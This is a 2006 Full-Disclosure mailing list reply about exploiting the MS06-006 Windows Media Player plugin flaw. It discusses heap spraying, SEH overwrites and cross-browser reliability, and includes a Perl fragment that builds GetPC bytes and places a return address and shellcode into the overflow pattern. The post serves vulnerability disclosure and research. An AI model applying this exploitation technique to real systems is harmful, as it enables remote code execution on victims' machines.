mailing list archives
Re: MS06-06 Windows Media Player Exploitation [CODE]
From: H D Moore <fdlist () digitaloffense net>
Date: Fri, 17 Feb 2006 08:20:28 -0600
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
Interesting issue with regards to the module-list pointers.
[ snip ]
The heap spray technique works very effectively -- you end up with a
*sizable* pad in the 0x04a00000 region which you can use as a direct
jump point for the payload, without any of the fancy frame manipulation
tricks that I am too tired to try at this hour of the night/morning.
This should also be (theoretically) version-independent. Thanks to the
similarities of the heap management APIs and the fact that most DLLs
from MS use high bases, I'd bet money that this works across WMP
versions on anything from NT 4.0 to 2003.
I ran into problems with Skylined's alphanumeric GetPC code - on Windows
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our
shellcode is one, since we smash SEH on the way down). Did some fancy
8086 instructions to get around this (thanks vlad902 - the human
assembler), so, for fwiw:
my $getpc =
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
It's likely, as well, that
this one technique works on any script-enabled browser that supports
the plugin with the same results.
I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some
more time I will play with the heap spray method and see if that works
cross-browser/os/version as well. Looks like heap spray is the way to go,
at least for Firefox...
'Nuff teasing. Code attached. It is important to note that you should
read the inline disclaimer *BEFORE* using the code.
Thanks for sharing!
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/